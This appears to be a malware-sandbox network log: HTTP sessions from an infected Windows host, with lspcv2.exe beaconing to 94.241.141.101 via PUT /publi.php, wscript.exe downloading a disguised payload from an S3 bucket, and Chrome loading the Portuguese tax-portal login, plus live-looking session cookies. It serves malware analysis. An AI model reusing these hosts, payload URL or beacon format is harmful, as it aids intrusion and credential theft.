                                                                                                                  Nov 14, 2024 15:01:37.714978933 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:37.720057964 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:38.630162001 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  136 | 192.168.2.4 | 50201 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:37.735080004 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:37.742115021 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:38.626394987 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  137 | 192.168.2.4 | 50202 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:37.910877943 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:37.915844917 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:38.792589903 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  138 | 192.168.2.4 | 50203 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:38.751005888 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:38.756357908 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:39.655375957 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  139 | 192.168.2.4 | 50204 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:38.751466990 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:38.756756067 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:39.630755901 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  140 | 192.168.2.4 | 50205 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:38.922874928 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:38.927962065 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:39.811424017 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  141 | 192.168.2.4 | 50206 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:39.745696068 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:39.750616074 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:40.628463030 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  142 | 192.168.2.4 | 50207 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:39.781836987 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:39.787040949 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:40.664778948 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  143 | 192.168.2.4 | 50208 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:39.939001083 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:39.944149017 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:40.833300114 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  144 | 192.168.2.4 | 50209 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:40.745074987 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:40.750411987 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:41.621280909 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  145 | 192.168.2.4 | 50210 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:40.781945944 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:40.788230896 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:41.694402933 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  146 | 192.168.2.4 | 50211 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:40.958674908 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:40.963660002 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:41.853812933 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  147 | 192.168.2.4 | 50212 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:41.746366978 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:41.754121065 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:42.648698092 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  148 | 192.168.2.4 | 50213 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:41.814990044 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:41.820504904 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:42.713119984 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  149 | 192.168.2.4 | 50214 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:41.970921040 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:41.975934982 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:42.879658937 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  0 | 192.168.2.4 | 49730 | 16.12.9.14 | 443 | 5332 | C:\Windows\System32\wscript.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:49 UTC | 372 | OUT | GET /preferencia.cdr HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-ch
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-11-14 13:59:49 UTC | 430 | IN | HTTP/1.1 200 OK
                                                                                                                  x-amz-id-2: Yp3bnhONK63OpqQbMESsfwP1+JUveVK1z3jyUagS9HjFF0ldrZRGOzh6SWTconk5sDQpTRNJsOI=
                                                                                                                  x-amz-request-id: 5NW8JQCDY35X6SHR
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:50 GMT
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 12:02:39 GMT
                                                                                                                  ETag: "9d292d1bcfe5fd895369e49c0c4b7af5-2"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Type: binary/octet-stream
                                                                                                                  Content-Length: 18292220
                                                                                                                  Server: AmazonS3
                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:51 UTC | 706 | OUT | GET /v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-11-14 13:59:51 UTC | 1203 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:51 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Cache-Control: no-store
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Content-Language: en-US
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  Content-Type: text/html;charset=utf-8
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Set-Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; path=/; HttpOnly;SameSite=None;Secure
                                                                                                                  Set-Cookie: AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; path=/; Httponly; Secure; SameSite=strict
                                                                                                                  Set-Cookie: TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; Path=/; Secure; HTTPOnly
                                                                                                                  Set-Cookie: TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039; Secure; Path=/
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Transfer-Encoding: chunked
2024-11-14 13:59:51 UTC | 12377 | IN | Data Ascii: 3051<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content=
2024-11-14 13:59:51 UTC | 2671 | IN | Data Ascii: a68 <a href="/alterarDadosAcessoForm?partID=PFAP&path=&#x2f;geral&#x2f;dashboard&authMethods=NIF,EORI,CARTAO_DE_CIDADAO" title="Alterar Dados de Acesso">Alterar Dados de Acesso</a> </li> <li>
2024-11-14 13:59:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:52 UTC | 1141 | OUT | GET /autentica_static/css/styles.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
2024-11-14 13:59:52 UTC | 363 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:01:50 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/css
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:52 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 52750
2024-11-14 13:59:52 UTC | 16021 | IN | Data Ascii: .main-header-body{background:#ffffff;border-bottom:solid 1px #ececec;padding:15px 0;position:relative;z-index:1;-webkit-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);-moz-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);box-shadow:0px 3px 5px 0px rg
2024-11-14 13:59:52 UTC | 16384 | IN | Data Ascii: :"\f131";}.fa-shield:before{content:"\f132";}.fa-calendar-o:before{content:"\f133";}.fa-fire-extinguisher:before{content:"\f134";}.fa-rocket:before{content:"\f135";}.fa-maxcdn:before{content:"\f136";}.fa-chevron-circle-left:before{content:"\f137";}
2024-11-14 13:59:52 UTC | 363 | IN | Data Ascii: r:#333;border:1px solid #E3E3E3;padding:10px 14px;width:100%;height:40px;background-color:#ffffff;border-radius:5px;}.text-input input.error,.textarea-input input.error,.text-input textarea.error,.textarea-input textarea.error,.text-input .input-group.err
2024-11-14 13:59:53 UTC | 16384 | IN | Data Ascii: nput,.text-input.focus textarea,.textarea-input.focus textarea{border-color:#0084cc;box-shadow:0 0 10px #9ecaed;}.text-input ::-webkit-input-placeholder,.textarea-input ::-webkit-input-placeholder{color:#9B9B9B;}.text-input :-moz-placeholder,.textarea-i
2024-11-14 13:59:53 UTC | 3598 | IN | Data Ascii: n and (max-width:1210px){.grid{margin:0 20px;} .multiple-authentication-section .info-panel,.multiple-authentication-section .authentication-panel{padding-left:10px;margin-left:10px;max-width:520px;} .multiple-authentication-section .right-fixed-panel{mar


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:52 UTC | 1144 | OUT | GET /autentica_static/css/sa-custom.css?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
